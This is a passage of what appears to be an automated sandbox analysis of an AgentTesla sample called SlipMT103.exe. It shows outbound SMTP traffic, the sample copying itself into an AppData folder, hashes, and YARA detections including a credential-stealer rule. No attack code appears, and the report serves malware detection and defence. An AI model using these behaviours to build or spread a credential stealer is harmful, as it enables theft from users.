Nov 25, 2021 18:04:37.056906939 CET | 587 | 49830 | 51.83.52.225 | 192.168.2.6 | 354 Enter message, ending with "." on a line by itself
Nov 25, 2021 18:04:37.059407949 CET | 49830 | 587 | 192.168.2.6 | 51.83.52.225 | .
Nov 25, 2021 18:04:37.086770058 CET | 587 | 49830 | 51.83.52.225 | 192.168.2.6 | 250 OK id=1mqIAn-00HaMy-1V

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 18:02:42
Start date: 25/11/2021
Path: C:\Users\user\Desktop\SlipMT103.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\SlipMT103.exe"
Imagebase: 0x680000
File size: 512000 bytes
MD5 hash: 5CBAC1B17CEF2BC95F5B18F87EC1DE49
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.360382819.0000000002AF1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.361078154.0000000003AFD000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.361078154.0000000003AFD000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.360569240.0000000002BBA000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 18:02:45
Start date: 25/11/2021
Path: C:\Users\user\Desktop\SlipMT103.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\SlipMT103.exe
Imagebase: 0x450000
File size: 512000 bytes
MD5 hash: 5CBAC1B17CEF2BC95F5B18F87EC1DE49
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.358186685.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.358186685.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.356758159.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.356758159.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.357240049.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.357240049.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.356357042.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.356357042.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.618546688.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.618546688.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.626792715.00000000027A1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.626792715.00000000027A1000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 18:03:23
Start date: 25/11/2021
Path: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe"
Imagebase: 0xee0000
File size: 512000 bytes
MD5 hash: 5CBAC1B17CEF2BC95F5B18F87EC1DE49
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.452252607.00000000043AD000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000002.452252607.00000000043AD000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000A.00000002.451118533.00000000033A1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000A.00000002.451324743.000000000346B000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 40%, ReversingLabs
Reputation: low

General

Start time: 18:03:27
Start date: 25/11/2021
Path: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
Imagebase: 0x720000
File size: 512000 bytes
MD5 hash: 5CBAC1B17CEF2BC95F5B18F87EC1DE49
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000000.446727696.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000C.00000000.446727696.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.618566079.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000C.00000002.618566079.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000000.448106925.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000C.00000000.448106925.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000000.444571373.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000C.00000000.444571373.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000000.445138730.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000C.00000000.445138730.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 18:03:31
Start date: 25/11/2021
Path: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe"
Imagebase: 0x970000
File size: 512000 bytes
MD5 hash: 5CBAC1B17CEF2BC95F5B18F87EC1DE49
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: low

Disassembly

Code Analysis